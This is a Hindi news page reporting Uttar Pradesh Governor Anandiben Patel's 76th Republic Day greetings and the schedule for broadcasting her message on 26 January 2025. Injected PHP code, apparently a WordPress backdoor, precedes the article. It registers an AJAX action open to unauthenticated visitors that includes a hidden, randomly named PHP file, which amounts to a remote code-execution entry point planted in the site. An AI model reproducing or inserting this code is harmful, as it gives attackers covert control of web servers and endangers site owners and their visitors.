if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }राज्यपाल ने प्रदेशवासियों को 76वें गणतंत्र दिवस के अवसर पर बधाई दी - Current Media

राज्यपाल ने प्रदेशवासियों को 76वें गणतंत्र दिवस के अवसर पर बधाई दी

लखनऊ:         उत्तर प्रदेश की राज्यपाल श्रीमती आनंदीबेन पटेल ने 76वें गणतंत्र दिवस के पावन अवसर पर प्रदेश एवं देशवासियों को हार्दिक बधाई एवं शुभकामनाएं दी हैं।
राज्यपाल जी ने गणतंत्र दिवस की पूर्व संध्या पर जारी अपने बधाई सन्देश में कहा कि गणतंत्र दिवस का पर्व हम सभी को एक सूत्र में बांधने वाली भारतीयता के गौरव का उत्सव है। हमारा संविधान प्रत्येक भारतीय नागरिक के अधिकारों और कर्तव्यों का मार्गदर्शन करता है। उन्होंने कहा कि भारतीय लोकतंत्र की शक्ति और विविधता राष्ट्र की प्रगति का मूल मंत्र है। भारतीय लोकतंत्र की अद्वितीयता और शक्ति के कारण हम हर क्षेत्र में नए आयाम स्थापित कर रहे हैं। यह दिवस हमें संविधान की ताकत और हमारे कर्तव्यों को समझने की प्रेरणा देता है।
राज्यपाल जी ने अपील की कि इस शुभ अवसर पर विविधता में एकता की संस्कृति को बनाये रखते हुए अपने संविधान निर्माताओं की आकांक्षाओं एवं महापुरुषों की इच्छाओं को पूर्ण करने का संकल्प लें और आत्मनिर्भर भारत का सपना साकार करें।
गणतंत्र दिवस के अवसर पर राज्यपाल जी का जनता के नाम सन्देश 26 जनवरी, 2025 को दूरदर्शन केन्द्र, लखनऊ से प्रातः 8ः30 बजे और प्रदेश के सभी आकाशवाणी केन्द्रों से रात्रि 8ः00 बजे प्रसारित किया जाएगा।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

खिरिया घाट पर अवैध खनन के खिलाफ बड़ी कार्रवाई, आधा दर्जन से अधिक ट्रैक्टर-ट्रॉलियां पकड़ीं

झांसी। राशिद पठान । अवैध खनन के खिलाफ प्रशासन ने गुरुवार रात बड़ी कार्रवाई करते …